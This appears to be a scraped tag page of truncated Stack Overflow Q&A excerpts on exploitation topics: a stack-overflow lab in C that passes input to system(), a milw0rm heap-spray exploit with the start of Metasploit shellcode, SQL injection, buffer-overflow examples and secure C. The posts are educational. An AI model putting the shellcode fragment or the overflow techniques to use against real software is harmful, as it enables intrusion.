exploit

Stack Overflow Exploit in C

生来就可爱ヽ(ⅴ<●) 提交于 2019-11-27 11:49:29
问题 The question is actually about stack overflows in C. I have an assigment that I can not get done for the life of me, I've looked at everything in the gdb and I just cant figure it. The question is the following: int i,n; void confused() { printf("who called me"); exit(0); } void shell_call(char *c) { printf(" ***Now calling \"%s\" shell command *** \n",c); system(c); exit(0); } void victim_func() { int a[4]; printf("[8]:%x\n", &a[8]); printf("Enter n: "); scanf("%d",&n); printf("Enter %d HEX

Can parameterized statement stop all SQL injection?

让人想犯罪 __ 提交于 2019-11-27 10:50:32
If yes, why are there still so many successful SQL injections? Just because some developers are too dumb to use parameterized statements? The links that I have posted in my comments to the question explain the problem very well. I've summarised my feelings on why the problem persists, below: Those just starting out may have no awareness of SQL injection. Some are aware of SQL injection, but think that escaping is the (only?) solution. If you do a quick Google search for php mysql query , the first page that appears is the mysql_query page, on which there is an example that shows interpolating

How does this milw0rm heap spraying exploit work?

耗尽温柔 提交于 2019-11-27 08:55:07
问题 I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm. Here is the code: <html> <div id="replace">x</div> <script> // windows/exec - 148 bytes // http://www.metasploit.com // Encoder: x86/shikata_ga_nai // EXITFUNC=process, CMD=calc.exe var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff

How do I create formatted javascript console log messages

ぃ、小莉子 提交于 2019-11-27 05:01:24
问题 I 'waddled' by the Console in Chrome on Facebook today. Surprisingly I got this message in the console. Now my question is: How is this possible? I know that there are a few 'exploit' methods for the console, but how can you make such font formatting in the console? (and is it console.log?) 回答1: Yes, you can format the console.log() with something like this: console.log("%cExtra Large Yellow Text with Red Background", "background: red; color: yellow; font-size: x-large"); Note the %c

Writing Secure C and Secure C Idioms

爷,独闯天下 提交于 2019-11-26 23:50:06
问题 "The average man does not want to be free. He simply wants to be safe." - H. L. Menken I am attempting to write very secure C. Below I list some of the techniques I use and ask are they as secure as I think they are. Please don't not hesitate to tear my code/preconceptions to shreds. Any answer that finds even the most trivial vulnerability or teaches me a new idea will be highly valued . Reading from a stream: According to the GNU C Programming Tutorial getline: The getline function will

buffer overflow example from Art of Exploitation book

南笙酒味 提交于 2019-11-26 18:14:37
问题 I was reading this book Art of Exploitation, which is kinda good book and I run across that example from exploit_notesearch.c file. Briefly author tries to overflow program from notesearch.c int main(int argc, char *argv[]) { int userid, printing=1, fd; char searchstring[100]; if(argc > 1) // If there is an arg strcpy(searchstring, argv[1]); else // otherwise, searchstring[0] = 0; The argument of the main function is copied to the searchstring array and if the argument is bigger than 100

Using a Single system() Call to Execute Multiple Commands in C

送分小仙女□ 提交于 2019-11-26 17:04:43
问题 In an information security lab I'm working on, I've been tasked with executing multiple commands with a single call to "system()" (written in C, running on Fedora). What is the syntax that will allow me to execute more than command through system()? (The idea being you could execute arbitrary commands through a program running on a remote computer, if the program interacts with the OS through the system() call.) I.e.: char command[] = "????? \r\n"; system(command); 回答1: That depends on the

Can parameterized statement stop all SQL injection?

本秂侑毒 提交于 2019-11-26 15:19:11
问题 If yes, why are there still so many successful SQL injections? Just because some developers are too dumb to use parameterized statements? 回答1: The links that I have posted in my comments to the question explain the problem very well. I've summarised my feelings on why the problem persists, below: Those just starting out may have no awareness of SQL injection. Some are aware of SQL injection, but think that escaping is the (only?) solution. If you do a quick Google search for php mysql query ,
订阅 exploit